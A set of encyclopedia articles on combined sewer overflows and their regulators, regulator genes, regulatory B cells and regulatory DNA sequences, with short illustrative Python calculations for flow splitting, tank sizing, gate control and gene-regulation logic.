In the majority of developed countries, large efforts were made during the late 19th and early 20th centuries to cover the formerly open sewers, converting them to closed systems with cast iron, steel, or concrete pipes, masonry, and concrete arches, while streets and footpaths were increasingly covered with impermeable paving systems. Most sewage collection systems of the 19th and early to mid-20th century used single-pipe systems that collect both sewage and urban runoff from streets and roofs (to the extent that relatively clean rooftop rainwater was not saved in butts and cisterns for drinking and washing). This type of collection system is referred to as a "combined sewer system". The rationale for combining the two was that it would be cheaper to build just a single system. [ 4 ] : 8 Most cities at that time did not have sewage treatment plants, so there was no perceived public health advantage in constructing a separate "surface water sewerage" (UK terminology) or " storm sewer " (US terminology) system. [ 2 ] : pp. 2–3 Moreover, before the automobile era, runoff was typically highly contaminated with animal waste, and until the mid-to-late 19th century the frequent use of shambles contributed further waste. The widespread replacement of horses with automotive propulsion, the paving of city streets and surfaces, the construction of municipal slaughterhouses, and the provision of mains water in the 20th century changed the nature and volume of urban runoff: it became initially cleaner, but came to include water that had formerly soaked away, as well as rooftop rainwater that had previously been saved, after combined sewers were already widely adopted.
When constructed, combined sewer systems were typically sized to carry three [ 2 ] : pp. 2–4 to 160 times the average dry weather sewage flows. [ 5 ] : 136 It is generally infeasible to treat the volume of mixed sewage and surface runoff flowing in a combined sewer during peak runoff events caused by snowmelt or convective precipitation . As cities built sewage treatment plants, those plants were typically built to treat only the volume of sewage flowing during dry weather. Relief structures were installed in the collection system to bypass untreated sewage mixed with surface runoff during wet weather, protecting sewage treatment plants from damage caused if peak flows reached the headworks . [ 6 ]
These relief structures, called "storm-water regulators" (in American English ) or "combined sewer overflows" (in British English ), are constructed in combined sewer systems to divert flows in excess of the peak design flow of the sewage treatment plant. [ 6 ] Combined sewers are built with control sections establishing stage-discharge or pressure differential-discharge relationships which may be either predicted or calibrated to divert flows in excess of sewage treatment plant capacity. A leaping weir may be used as a regulating device, allowing typical dry-weather sewage flow rates to fall into an interceptor sewer leading to the sewage treatment plant, but causing a major portion of higher flow rates to leap over the interceptor into the diversion outfall. Alternatively, an orifice may be sized to accept the sewage treatment plant design capacity and cause excess flow to accumulate above the orifice until it overtops a side-overflow weir to the diversion outfall. [ 5 ] : 112–114
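Whatever the hydraulic device, the regulator's net effect can be approximated as a simple flow split. The sketch below uses a made-up storm hydrograph and interceptor capacity; it illustrates the principle, and is not a hydraulic model of a weir or orifice:

```python
# Flow up to the interceptor (treatment) capacity continues to the plant;
# the excess is diverted through the outfall. All values are hypothetical.
INTERCEPTOR_CAPACITY = 3.0   # m^3/s, roughly 3x dry-weather flow

# Combined flow arriving at the regulator each hour during a storm:
inflow = [1.0, 2.5, 6.0, 9.0, 5.0, 2.0, 1.0]

to_plant, overflow = [], []
for q in inflow:
    to_plant.append(min(q, INTERCEPTOR_CAPACITY))
    overflow.append(max(0.0, q - INTERCEPTOR_CAPACITY))

# 3600 seconds per hourly step converts flow rate to volume.
print(sum(overflow) * 3600, "m^3 discharged untreated")  # 39600.0 m^3
```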
CSO statistics may be confusing because the term may describe either the number of events or the number of relief structure locations at which such events may occur. A CSO event, as the term is used in American English, occurs when mixed sewage and stormwater are bypassed from a combined sewer system control section into a river, stream, lake, or ocean through a designed diversion outfall , but without treatment. Overflow frequency and duration varies both from system to system, and from outfall to outfall, within a single combined sewer system. Some CSO outfalls discharge infrequently, while others activate every time it rains. [ 2 ] : pp. 2–3, 2–4
The storm water component contributes pollutants to CSO, but a major fraction of the pollution is the first foul flush of accumulated biofilm and sanitary solids scoured from the dry weather wetted perimeter of combined sewers during peak flow turbulence . [ 8 ] Each storm is different in the quantity and type of pollutants it contributes. For example, storms that occur in late summer, when it has not rained for a while, carry the most pollutants. Pollutants like oil, grease, fecal coliform from pet and wildlife waste, and pesticides get flushed into the sewer system. In cold weather areas, pollutants from cars, people and animals also accumulate on hard surfaces and grass during the winter and are then flushed into the sewer systems during heavy spring rains.
CSO discharges during heavy storms can cause serious water pollution problems. The discharges contain human and industrial waste, and can cause beach closings, restrictions on shellfish consumption and contamination of drinking water sources. [ 2 ]
CSOs differ from sanitary sewer overflows in that the latter are caused by sewer system obstructions, damage, or flows in excess of sewer capacity (rather than treatment plant capacity.) [ 2 ] : Ch.4 Sanitary sewer overflows may occur at any low spot in the sewer system rather than at the CSO relief structures. Absence of a diversion outfall often causes sanitary sewer overflows to flood residential structures and/or flow over traveled road surfaces before reaching natural drainage channels. Sanitary sewer overflows may cause greater health risks and environmental damage than CSOs if they occur during dry weather when there is no precipitation runoff to dilute and flush away sewage pollutants.
About 860 communities in the US have combined sewer systems, serving about 40 million people. [ 9 ] Pollutants from CSO discharges can include bacteria and other pathogens , toxic chemicals, and debris. These pollutants have also been linked with antimicrobial resistance , posing serious public health concerns. [ 10 ] The U.S. Environmental Protection Agency (EPA) issued a policy in 1994 requiring municipalities to make improvements to reduce or eliminate CSO-related pollution problems. [ 11 ] The policy is implemented through the National Pollutant Discharge Elimination System (NPDES) permit program. The policy defined water quality parameters for the safety of an ecosystem; it allowed for site-specific actions to control CSOs in the most practical way for each community; it ensured that CSO control would not be beyond a community's budget; and it allowed water quality parameters to be flexible, based upon site-specific conditions. The CSO Control Policy required all publicly owned treatment works to have "nine minimum controls" in place by January 1, 1997, in order to decrease the effects of sewage overflow by making small improvements in existing processes. [ 12 ] In 2000 Congress amended the Clean Water Act to require municipalities to comply with the EPA policy. [ 13 ]
Cities with combined sewer overflows employ one or more engineering approaches to reduce discharges of untreated sewage, including:
The United Kingdom Environment Agency identified unsatisfactory intermittent discharges and issued an Urban Wastewater Treatment Directive requiring action to limit pollution from combined sewer overflows. [ 15 ] In 2009, the Canadian Council of Ministers of the Environment adopted a Canada-wide Strategy for the Management of Municipal Wastewater Effluent including national standards to (1) remove floating material from combined sewer overflows, (2) prevent combined sewer overflows during dry weather, and (3) prevent development or redevelopment from increasing the frequency of combined sewer overflows. [ 16 ]
Rehabilitation of combined sewer systems to mitigate CSOs requires extensive monitoring networks, which are becoming more prevalent with decreasing sensor and communication costs. [ 17 ] These monitoring networks can identify the bottlenecks causing the main CSO problem, or aid in the calibration of hydrodynamic or hydrological models to enable cost-effective CSO mitigation.
Municipalities in the US have been undertaking projects to mitigate CSO since the 1990s. For example, prior to 1990, the quantity of untreated combined sewage discharged annually to lakes, rivers, and streams in southeast Michigan was estimated at more than 30 billion US gallons (110,000,000 m 3 ) per year. In 2005, with nearly $1 billion of a planned $2.4 billion CSO investment put into operation, untreated discharges have been reduced by more than 20 billion US gallons (76,000,000 m 3 ) per year. This investment that has yielded an 85 percent reduction in CSO has included numerous sewer separation, CSO storage and treatment facilities, and wastewater treatment plant improvements constructed by local and regional governments. [ 18 ]
Many other areas in the US are undertaking similar projects (see, for example, in the Puget Sound of Washington). [ 19 ] Cities like Pittsburgh , Seattle , Philadelphia , and New York are focusing on these projects partly because they are under federal consent decrees to solve their CSO issues. Both up-front penalties and stipulated penalties are utilized by EPA and state agencies to enforce CSO-mitigating initiatives and the efficiency of their schedules. Municipalities' sewage departments, engineering and design firms, and environmental organizations offer different approaches to potential solutions.
Some US cities have undertaken sewer separation projects—building a second piping system for all or part of the community. In many of these projects, cities have been able to separate only portions of their combined systems. High costs or physical limitations may preclude building a completely separate system. [ 20 ] In 2011, Washington, D.C. , separated its sewers in four small neighborhoods at a cost of $11 million. (The project cost also included improvements to the drinking water piping system.) [ 21 ] [ 22 ]
Another solution is to build a CSO storage facility, such as a tunnel that can store flow from many sewer connections. Because a tunnel can share capacity among several outfalls, it can reduce the total volume of storage that must be provided for a specific number of outfalls. Storage tunnels store combined sewage but do not treat it. When the storm is over, the flows are pumped out of the tunnel and sent to a wastewater treatment plant. [ 18 ] One of the main concerns with CSO storage is the length of time it is stored before it is released. Without careful management of this storage period, the water in the CSO storage facility runs the risk of going septic. [ clarification needed ] [ citation needed ]
Washington, D.C. , is building underground storage capacity as its primary strategy to address CSOs. In 2011, the city began construction on a system of four deep storage tunnels, adjacent to the Anacostia River , that will reduce overflows to the river by 98 percent, and 96 percent system-wide. The system will comprise over 18 miles (29 km) of tunnels with a storage capacity of 157 million US gallons (590,000 m 3 ). [ 23 ] The first segment of the tunnel system, 7 miles (11 km) in length, went online in 2018. The remaining segments of the storage system are scheduled for completion in 2023. [ 24 ] (The city's overall "Clean Rivers" project, projected to cost $2.6 billion, includes other components, such as reducing stormwater flows .) [ 25 ] The South Boston CSO Storage Tunnel is a similar project, completed in 2011.
Indianapolis , Indiana, is building underground storage capacity in the form of a 28-mile (45 km) 18-foot (5.5 m) diameter deep rock tunnel system which will connect the two existing wastewater treatment plants, and provide collection of discharge water from the various CSO sites located along the White River , Eagle Creek, Fall Creek , Pogue's Run , and Pleasant Run. [ 26 ] Citizens Energy Group is managing the efforts to construct the first phases of the work, which includes a 250-foot (76 m) deep Deep Rock Tunnel Connector between the Belmont Wastewater Treatment Plant and the Southport Wastewater Treatment Plant. Additional tunnels will branch under the existing watercourses located in Indianapolis. The planned cost for the project will total $1.9 billion. [ 27 ]
Fort Wayne , Indiana, is constructing a 4.5-mile (7.2 km), 14-foot (4.3 m) diameter, $180M tunnel, the 3RPORT [ 28 ] (Three Rivers Protection and Overflow Reduction Tunnel), to address the myriad CSOs which outfall into the St. Mary's , St. Joseph , and Maumee Rivers . The 3RPORT is approximately 160 feet (49 m) below grade, and is anticipated to enter service in 2023.
In March 2024 [ 29 ] the Thames Tideway Tunnel was completed in London at a cost of around £5bn, with it reaching full operation in early 2025. The tunnel promises to reduce CSO spills by up to 95%. [ 30 ]
Some cities have expanded their basic sewage treatment capacity to handle some or all of the CSO volume. In 2002 litigation forced the city of Toledo, Ohio , to double its treatment capacity and build a storage basin in order to eliminate most overflows. The city also agreed to study ways to reduce stormwater flows into the sewer system. ( See Reducing stormwater flows .) [ 31 ]
Retention treatment basins or large concrete tanks that store and treat combined sewage are another solution. These underground structures can range in storage and treatment capacity from 2 million US gallons (7,600 m 3 ) to 120 million US gallons (450,000 m 3 ) of combined sewage. While each facility is unique, a typical facility operation is as follows. Flows from the overloaded sewers are pumped into a basin that is divided into compartments. The first flush compartment captures and stores flows with the highest level of pollutants from the first part of a storm. These pollutants include motor oil , sediment, road salt , and lawn chemicals (pesticides and fertilizers ) that are picked up by the stormwater as it runs off roads and lawns. The flows from this compartment are stored and sent to the wastewater treatment plant when there is capacity in the interceptor sewer after the storm. The second compartment is a treatment or flow-through compartment. The flows are disinfected by injecting sodium hypochlorite , or bleach, as they enter this compartment. It then takes about 20‑30 minutes for the flows to move to the end of the compartment. During this time, bacteria are killed and large solid materials settle out. At the end of the compartment, any remaining sanitary trash is skimmed off the top and the treated flows are discharged into the river or lake. [ 18 ]
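The 20-30 minute contact time quoted above directly sizes the flow-through compartment: its volume must be at least the design flow multiplied by the contact time. A minimal worked example follows; the design flow figure is hypothetical:

```python
# Sizing a disinfection (flow-through) compartment by contact time.
design_flow_m3_per_min = 200.0   # hypothetical peak flow through compartment
contact_time_min = 25.0          # middle of the 20-30 minute range above

required_volume_m3 = design_flow_m3_per_min * contact_time_min
print(required_volume_m3, "m^3")  # 5000.0 m^3 (~1.3 million US gallons)
```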
The City of Detroit , Michigan, utilizes a system of nine CSO retention basins and screening/disinfection facilities that are owned and operated by the Great Lakes Water Authority . These basins are located at original combined sewer outfalls located along the Detroit River and Rouge River within metropolitan Detroit. These facilities are generally designed to contain two inches of stormwater runoff , with the ability to disinfect overflows during extreme wet-weather rainfall events.
Screening and disinfection facilities treat CSO without ever storing it. Called "flow-through" facilities, they use fine screens to remove solids and sanitary trash from the combined sewage. Flows are injected with sodium hypochlorite for disinfection and mixed as they travel through a series of fine screens to remove debris. The fine screens have openings that range in size from 4 to 6 mm, or a little less than a quarter inch. The flow is sent through the facility at a rate that provides enough time for the sodium hypochlorite to kill bacteria. All of the materials removed by the screens are then sent to the sewage treatment plant through the interceptor sewer. [ 32 ]
Communities may implement low impact development techniques to reduce flows of stormwater into the collection system. This includes:
CSO mitigating initiatives that consist solely of sewer system reconstruction are referred to as gray infrastructure, while techniques like permeable pavement and rainwater harvesting are referred to as green infrastructure . Conflict often arises between a municipality's sewage authority and environmentally active organizations over gray versus green infrastructure plans. [ citation needed ]
The 2004 EPA Report to Congress on CSOs provides a review of available technologies to mitigate CSO impacts. [ 2 ] : Ch. 8
Recent technological advances in sensing and control have enabled the implementation of real-time decision support systems (RT-DSS) for CSO mitigation. Through the use of internet of things technology and cloud computing , CSO events can now be mitigated by dynamically adjusting setpoints for movable gates, pump stations, and other actuated assets in sewers and storm water management systems. Similar technology, called adaptive traffic control is used to control the flow of vehicles through traffic lights. RT-DSS systems take advantage of storm temporal and spatial variability as well as varying concentration times due to diverse land uses across the sewershed to coordinate and optimize control assets. By maximizing storage and conveyance RT-DSS are able to minimize overflows using existing infrastructure. Successful implementations of RT-DSS have been carried out throughout the United States [ 33 ] [ 34 ] [ 35 ] and Europe. [ 36 ]
Real-time control (RTC) can be either heuristic or model based. Model-based control is theoretically more optimal, [ 37 ] but due to the ease of implementation, heuristic control is more commonly applied. Generating sufficient evidence that RTC is a suitable option for CSO mitigation remains problematic, although new performance methods might make this possible. [ 38 ]
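A heuristic RTC scheme of the kind mentioned above can be as simple as a few if-then rules evaluated at each control step. The sketch below is illustrative only; the sensor names, thresholds, and gate logic are assumptions, and production systems add fail-safes, hydraulic models, and operator overrides:

```python
# Heuristic (rule-based) real-time control of one regulator gate: hold flow
# back while in-system storage remains, release when the downstream
# interceptor has spare capacity. All names and values are hypothetical.

def gate_setpoint(storage_level: float, interceptor_util: float) -> float:
    """Return a gate opening in [0, 1] from two normalized sensor readings."""
    if storage_level > 0.9:          # storage nearly full: open fully
        return 1.0                   # to avoid uncontrolled surcharge
    if interceptor_util < 0.8:       # spare downstream capacity: release
        return 1.0 - interceptor_util
    return 0.1                       # otherwise hold water back in storage

# One control step with made-up telemetry:
print(gate_setpoint(storage_level=0.55, interceptor_util=0.6))  # 0.4
```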
There is in the UK a legal difference between a storm sewer and a surface water sewer. There is no right of connection to a storm-water overflow sewer under section 106 of the Water Industry Act. [ 39 ]
A storm sewer is normally the pipeline that discharges to a watercourse downstream of a combined sewer overflow; it takes the excess flow from a combined sewer. A surface water sewer conveys rainwater; legally there is a right of connection for rainwater to this public sewer. A public storm water sewer can discharge to a public surface water, but not the other way around, without a legal change in sewer status by the water company.
Combined sewer systems were common when urban sewerage systems were first developed, in the late 19th and early 20th centuries. [ 3 ]
The image of the sewer recurs in European culture as they were often used as hiding places or routes of escape by the scorned or the hunted, including partisans and resistance fighters in World War II . Fighting erupted in the sewers during the Battle of Stalingrad . Some of the last survivors from the Warsaw Uprising and Warsaw Ghetto made their final escape through city sewers. Some have commented that the engravings of imaginary prisons by Piranesi were inspired by the Cloaca Maxima , one of the world's earliest sewers.
The theme of traveling through, hiding, or even residing in combined sewers is a common plot device in media. Famous examples of sewer dwelling are the Teenage Mutant Ninja Turtles , Stephen King's It , Les Misérables , The Third Man , Ladyhawke , Mimic , The Phantom of the Opera , Beauty and the Beast , and Jet Set Radio Future . The Todd Strasser novel Y2K-9: the Dog Who Saved the World is centered on a dog thwarting terroristic threats to electronically sabotage American sewage treatment plants.
A well-known urban legend , the sewer alligator , is that of giant alligators or crocodiles residing in combined sewers, especially of major metropolitan areas. Two public sculptures in New York depict an alligator dragging a hapless victim into a manhole . [ 41 ]
Alligators have been known to get into combined storm sewers in the southeastern United States. Closed-circuit television by a sewer repair company captured an alligator in a combined storm sewer on tape. [ 42 ] | https://en.wikipedia.org/wiki/Regulator_(sewer) |
In genetics , a regulator gene , regulator , or regulatory gene is a gene involved in controlling the expression of one or more other genes. The regulatory sequences through which such control is exerted are often located upstream (5′) of the transcription start site of the gene they regulate, although they can also be found downstream (3′) of the transcription start site. In both cases, the regulatory sequence is often many kilobases away from the transcription start site . A regulator gene may encode a protein , or it may work at the level of RNA , as in the case of genes encoding microRNAs . An example of a regulator gene is a gene that codes for a repressor protein that inhibits the activity of an operator (a segment of DNA which binds repressor proteins, thus inhibiting transcription by RNA polymerase ). [ 1 ]
In prokaryotes , regulator genes often code for repressor proteins . Repressor proteins bind to operators or promoters , preventing RNA polymerase from transcribing RNA. They are usually constantly expressed so the cell always has a supply of repressor molecules on hand. [ 2 ] Inducers cause repressor proteins to change shape or otherwise become unable to bind DNA, allowing RNA polymerase to continue transcription.
Regulator genes can be located within an operon , adjacent to it, or far away from it. [ 3 ]
Other regulatory genes code for activator proteins . An activator binds to a site on the DNA molecule and causes an increase in transcription of a nearby gene. In prokaryotes, a well-known activator protein is the catabolite activator protein (CAP), involved in positive control of the lac operon .
In the regulation of gene expression , studied in evolutionary developmental biology (evo-devo), both activators and repressors play important roles. [ 4 ]
Regulatory genes can also be described as positive or negative regulators, based on the environmental conditions that surround the cell. Positive regulators are regulatory elements that permit RNA polymerase binding to the promoter region, thus allowing transcription to occur. In terms of the lac operon, the positive regulator is the CRP-cAMP complex, which must be bound close to the site of the start of transcription of the lac genes. The binding of this positive regulator allows RNA polymerase to bind successfully to the promoter of the lac gene sequence, which advances the transcription of the lac genes: lac Z, lac Y, and lac A. Negative regulators are regulatory elements that obstruct the binding of RNA polymerase to the promoter region, thus repressing transcription. In terms of the lac operon, the negative regulator is the lac repressor, which binds to the promoter in the same site that RNA polymerase normally binds. The binding of the lac repressor to RNA polymerase's binding site inhibits the transcription of the lac genes. Only when an inducer is bound to the lac repressor will the binding site be free for RNA polymerase to carry out transcription of the lac genes. [ 5 ] [ 6 ] [ 7 ]
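The combined effect of the two regulators described above can be summarized as simple boolean logic. The following sketch encodes only the textbook behavior of the lac operon; the function and its string outputs are illustrative:

```python
# Textbook lac operon logic: transcription is high only when the negative
# regulator (lac repressor) is released by the inducer AND the positive
# regulator (CRP-cAMP, formed when glucose is low) is bound at the promoter.

def lac_transcription(lactose_present: bool, glucose_present: bool) -> str:
    repressor_bound = not lactose_present   # inducer (allolactose) frees it
    crp_camp_bound = not glucose_present    # cAMP is high when glucose is low
    if repressor_bound:
        return "off"                        # RNA polymerase site is blocked
    return "high" if crp_camp_bound else "low"

for lactose in (True, False):
    for glucose in (True, False):
        print(f"lactose={lactose}, glucose={glucose}: "
              f"{lac_transcription(lactose, glucose)}")
```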
Promoters reside at the beginning of the gene and serve as the site where the transcription machinery assembles and transcription of the gene begins. Enhancers turn on the promoters at specific locations, times, and levels and can be simply defined as the “promoters of the promoter.” Silencers are thought to turn off gene expression at specific time points and locations. Insulators, also called boundary elements, are DNA sequences that create cis-regulatory boundaries that prevent the regulatory elements of one gene from affecting neighboring genes. The general dogma is that these regulatory elements get activated by the binding of transcription factors , proteins that bind to specific DNA sequences, and control mRNA transcription. There could be several transcription factors that need to bind to one regulatory element in order to activate it. In addition, several other proteins, called transcription cofactors, bind to the transcription factors themselves to control transcription. [ 8 ] [ 9 ]
Negative regulators act to prevent transcription or translation. Examples such as cFLIP suppress cell death mechanisms leading to pathological disorders like cancer , and thus play a crucial role in drug resistance . Circumvention of such actors is a challenge in cancer therapy . [ 10 ] Negative regulators of cell death in cancer include cFLIP , Bcl 2 family , Survivin , HSP , IAP , NF-κB , Akt , mTOR , and FADD . [ 10 ]
There are several different techniques to detect regulatory genes, but a few are used more frequently than others. One of these is ChIP-chip, an in vivo technique used to determine genomic binding sites for transcription factors, such as two-component system response regulators. An in vitro microarray-based assay (DAP-chip) can be used to determine gene targets and functions of two-component signal transduction systems. This assay takes advantage of the fact that response regulators can be phosphorylated, and thus activated, in vitro using small molecule donors like acetyl phosphate . [ 11 ] [ 12 ]
Phylogenetic footprinting is a technique that utilizes multiple sequence alignments to determine locations of conserved sequences such as regulatory elements. Along with multiple sequence alignments, phylogenetic footprinting also requires statistical rates of conserved and non-conserved sequences. Using the information provided by multiple sequence alignments and statistical rates, one can identify the best conserved motifs in the orthologous regions of interest. [ 13 ] [ 14 ]
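A minimal sketch of the underlying idea follows. It ignores the phylogeny and substitution-rate statistics mentioned above and simply scores alignment columns by the frequency of their most common base; the alignment, window width, and threshold are all hypothetical:

```python
# Score each column of a multiple sequence alignment by majority-base
# frequency, then report windows conserved above a threshold as candidate
# regulatory elements.
alignment = [                     # hypothetical orthologous promoter region
    "ATGCGTACGTTA",
    "ATGCGAACGTTC",
    "ATGCGTACGTAA",
]

def conserved_windows(aln, width=6, min_score=0.9):
    n_seqs, length = len(aln), len(aln[0])
    col_scores = []
    for i in range(length):
        column = [seq[i] for seq in aln]
        col_scores.append(max(column.count(b) for b in set(column)) / n_seqs)
    hits = []
    for start in range(length - width + 1):
        window = col_scores[start:start + width]
        if sum(window) / width >= min_score:
            hits.append((start, aln[0][start:start + width]))
    return hits

# Five overlapping windows near the 5' end pass the 90% cutoff:
print(conserved_windows(alignment))
```

| https://en.wikipedia.org/wiki/Regulator_gene |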
Regulatory B cells (Bregs or B reg cells) represent a small population of B cells that participates in immunomodulation and in the suppression of immune responses. The population of Bregs can be further separated into different human or murine subsets such as B10 cells , marginal zone B cells , Br1 cells, GrB + B cells, CD9 + B cells, and even some plasmablasts or plasma cells . Bregs regulate the immune system by different mechanisms. One of the main mechanisms is the production of anti-inflammatory cytokines such as interleukin 10 (IL-10), IL-35 , or transforming growth factor beta (TGF-β). Another known mechanism is the production of cytotoxic Granzyme B . Bregs also express various inhibitory surface markers such as programmed death-ligand 1 (PD-L1), CD39 , CD73 , and aryl hydrocarbon receptor . The regulatory effects of Bregs were described in various models of inflammation , autoimmune diseases , transplantation reactions, and in anti-tumor immunity. [ 1 ] [ 2 ] [ 3 ]
In the 1970s it was noticed that Bregs could suppress immune reactions independently of antibody production. [ 4 ] In 1996 Janeway's group observed immunomodulation of experimental autoimmune encephalomyelitis (EAE) by B cells. [ 5 ] Similar results were shown in a model of chronic colitis one year later. [ 6 ] A role for Bregs was subsequently found in many mouse models of autoimmune diseases, such as rheumatoid arthritis [ 7 ] and systemic lupus erythematosus (SLE). [ 8 ]
Bregs can develop from different subsets of B cells such as immature and mature B cells or plasmablasts . Whether Breg cells uniquely derive from a specific progenitor or originate within conventional B cell subsets is still an open question. [ 1 ] [ 9 ] Unfortunately, Breg cells are more difficult to define than regulatory T cells (Tregs), since they lack a lineage marker analogous to the Treg cell marker FOXP3 . [ 10 ] Bregs share many markers with various B cell subsets due to their origin. Human and murine Bregs can be further separated into many subsets owing to their different mechanisms of action and distinct expression of key surface markers (table below). It is estimated that IL-10 producing B cell subpopulations can constitute up to 10% of circulating human B cells. [ 11 ] There is still no clear consensus on the classification and definition of Breg cells. [ 1 ] Mouse Bregs were mainly CD5 and CD1d positive in the model of EAE or after exposure to Leishmania major . [ 12 ] [ 13 ] By contrast, mouse Bregs in a model of collagen-induced arthritis (CIA) were mainly CD21 and CD23 positive. [ 14 ] Bregs have also been found in humans: peripheral blood Bregs were marked by the molecules CD24 and CD38 . [ 15 ] However, peripheral blood Bregs were mostly CD24 and CD27 positive after cultivation with anti-CD40 antibody and CpG bacterial DNA . [ 16 ] They were also positive for CD25 , CD71 and PD-L1 after stimulation by CpG bacterial DNA acting through TLR9 . [ 17 ]
There are several mechanisms of Breg action. Nevertheless, the most examined mechanism is the production of IL-10. IL-10 has strong anti-inflammatory effects. [ 20 ] [ 21 ] It inhibits (or suppresses) inflammatory reactions mediated by T cells , especially Th1 and Th17 type immune reactions. This was shown, for example, in models of EAE, [ 22 ] CIA [ 23 ] and contact hypersensitivity. [ 24 ] Likewise, regulatory B cell subsets have also been demonstrated to inhibit Th1 responses through IL-10 production during chronic infectious diseases such as visceral leishmaniasis . [ 25 ] By producing IL-10, Bregs are also capable of converting naïve CD4 + T cells into Tregs and IL-10-secreting type 1 regulatory CD4 + T cells . This has been observed in various experimental models as well as in chronically virus-infected patients. [ 3 ] Another mechanism of Breg suppression is the production of transforming growth factor beta (TGF-β), an anti-inflammatory cytokine. [ 20 ] A role for TGF-β-producing Bregs was found in mouse models of SLE [ 8 ] and diabetes . [ 26 ] A further anti-inflammatory cytokine, produced only by some Bregs, is IL-35 , which plays a role in Treg conversion. Breg cells are capable of releasing IL-35-containing exosomes . It is not yet clear whether IL-10- and IL-35-producing Bregs correspond to separate populations or display some degree of overlap. [ 3 ] Besides the production of immunomodulatory cytokines, Bregs also release cytotoxic granzyme B, involved in the degradation of the T cell receptor and T cell apoptosis. [ 11 ] Another mechanism of Breg suppression involves surface molecules such as FasL , which induces T cell death, [ 27 ] or PD-1 and PD-L1 . PD-1 + Bregs have been shown to suppress CD4 + and CD8 + T cell activity and induce Tr1 cells, while PD-L1-expressing Bregs were reported to inhibit NK and CD8 + T cell cytotoxicity. [ 3 ] Some Bregs also express additional suppressive molecules such as CD39, CD73, and aryl hydrocarbon receptor. [ 1 ]
Resting B lymphocytes do not produce cytokines. After a response to antigen or to other stimuli such as lipopolysaccharide (LPS), both pro- and anti-inflammatory cytokines ( TNFα , IL-1β , IL-10 and IL-6 ) are produced. This indicates that Bregs must be stimulated to produce suppressive cytokines. There are two types of signals that activate Bregs, namely signals generated by external pathogens (PAMPs) and endogenous signals produced by the action of body cells. PAMPs are recognized by the toll-like receptors (TLRs). TLRs trigger a signal cascade at the end of which is the production of effector cytokines. Bregs are mainly generated after the recognition of TLR4 or TLR9 ligands (LPS and CpG , respectively). The main endogenous signal is the stimulation of the surface molecule CD40 . [ 1 ] [ 2 ] Some anti-inflammatory factors, such as IL-35 and retinoic acid , have also been proposed to induce the Breg phenotype. Additionally, the cytokine IL-21 , together with CD40 ligand and/or TLR9 signals, has been shown to induce B10 generation and the emergence of IL-10 producing plasmablasts during inflammatory processes. [ 3 ]
Bregs are studied in several human autoimmune diseases such as multiple sclerosis (MS), rheumatoid arthritis , SLE , type 1 diabetes , and Sjögren's syndrome . Generally, Breg cells seem to be important in preventing autoimmune diseases and are often reported to be reduced in number, or impaired in their inhibitory abilities, in autoimmunity. [ 1 ] [ 28 ]
The main reported mechanism by which Bregs moderate MS is the production of IL-10, IL-35, and TGF-β. Bregs have been extensively studied in the mouse model of multiple sclerosis, EAE, where the depletion of Bregs worsened the disease and increased the number of autoreactive T cells , but it is not clear whether the frequencies of Breg cells are altered in MS patients. Although one study reported normal Breg frequencies in MS patients, a few others have observed a decreased amount of Breg cells in patients. It has been reported that Glatiramer acetate , an approved medication for MS treatment, increases Breg frequencies and enhances their function. Similarly, Alemtuzumab , an antibody that binds CD52 on T and B cells and causes apoptosis or cell lysis, increases the frequency of Bregs in patients with relapsing MS. [ 1 ]
It has been observed that patients with SLE have deficiencies in the function of Bregs. Bregs isolated from patients have been reported to lose their regulatory capacity and to be unable to inhibit the expression of the pro-inflammatory cytokines IFN-γ and TNF-α by CD4 + T cells, compared to Bregs from healthy donors. Several studies have also noted a decrease in the percentage of IL-35 + and IL-10 + Breg cells in SLE patients. [ 1 ] [ 29 ]
In mouse models, IL-10-producing Bregs have been shown to control autoimmune diabetes. In type 1 diabetes (T1D), the evidence suggests that IL-10–producing Bregs are numerically and functionally defective in patients compared to healthy donors. Bregs in T1D have decreased production of IL-10 and are unable to suppress Th1 and Th17 immune responses. Moreover, these defective Bregs are unable to convert naive CD4 + T cells into Tregs. [ 19 ] [ 28 ]
Tumor-infiltrating B lymphocytes consist of various phenotypes, including both effector and regulatory B cells. IL-10 or Granzyme B-producing Bregs have been detected in various human cancers. Additionally, most studies have reported a positive correlation between Breg cells and Treg cells, indicating an interaction between these subsets. [ 10 ] Higher frequencies of IL-10-producing B cells have been observed in late-stage disease samples than in early-stage samples of esophageal cancer . [ 30 ] Leukemia B cells spontaneously produce large amounts of IL-10. [ 31 ] Moreover, increased levels of Bregs were detected in the peripheral blood and bone marrow of patients with acute myeloid leukemia . IL-10-producing Bregs are also present in gastric cancer , breast cancer , head and neck squamous carcinoma , and esophageal squamous carcinoma. The evidence suggests an immunosuppressive role for Bregs in cancer, and it is possible that proliferating cancers exploit Bregs to escape the immune response. [ 30 ]
It has been reported that patients undergoing kidney transplantation who were subjected to B-cell depletion therapy showed a higher incidence of graft rejection. The evidence shows that immunosuppressive properties of Bregs might play an essential role in allotransplants. Murine models of allotransplantation showed that Bregs increased the duration of allograft survival and controlled Th17, Tfh , and follicular regulatory T-cell differentiation. [ 1 ] In other types of transplants, B cells can participate both in tolerance and in transplant rejection, depending on the origin of the Breg subpopulation. [ 32 ] | https://en.wikipedia.org/wiki/Regulatory_B_cell |
A regulatory sequence is a segment of a nucleic acid molecule which is capable of increasing or decreasing the expression of specific genes within an organism. Regulation of gene expression is an essential feature of all living organisms and viruses.
In DNA , regulation of gene expression normally happens at the level of RNA biosynthesis ( transcription ). It is accomplished through the sequence-specific binding of proteins ( transcription factors ) that activate or inhibit transcription. Transcription factors may act as activators , repressors , or both. Repressors often act by preventing RNA polymerase from forming a productive complex with the transcriptional initiation region ( promoter ), while activators facilitate formation of a productive complex. Furthermore, DNA motifs have been shown to be predictive of epigenomic modifications, suggesting that transcription factors play a role in regulating the epigenome . [ 2 ]
In RNA , regulation may occur at the level of protein biosynthesis ( translation ), RNA cleavage, RNA splicing , or transcriptional termination. Regulatory sequences are frequently associated with messenger RNA (mRNA) molecules, where they are used to control mRNA biogenesis or translation. A variety of biological molecules may bind to the RNA to accomplish this regulation, including proteins (e.g., translational repressors and splicing factors), other RNA molecules (e.g., miRNA ) and small molecules , in the case of riboswitches .
A regulatory DNA sequence does not regulate unless it is activated. Different regulatory sequences are activated and then implement their regulation by different mechanisms.
Expression of genes in mammals can be upregulated when signals are transmitted to the promoters associated with the genes. Cis -regulatory DNA sequences that are located in DNA regions distant from the promoters of genes can have very large effects on gene expression, with some genes undergoing up to 100-fold increased expression due to such a cis -regulatory sequence. [ 3 ] These cis -regulatory sequences include enhancers , silencers , insulators and tethering elements. [ 4 ] Among this constellation of sequences, enhancers and their associated transcription factor proteins have a leading role in the regulation of gene expression. [ 5 ]
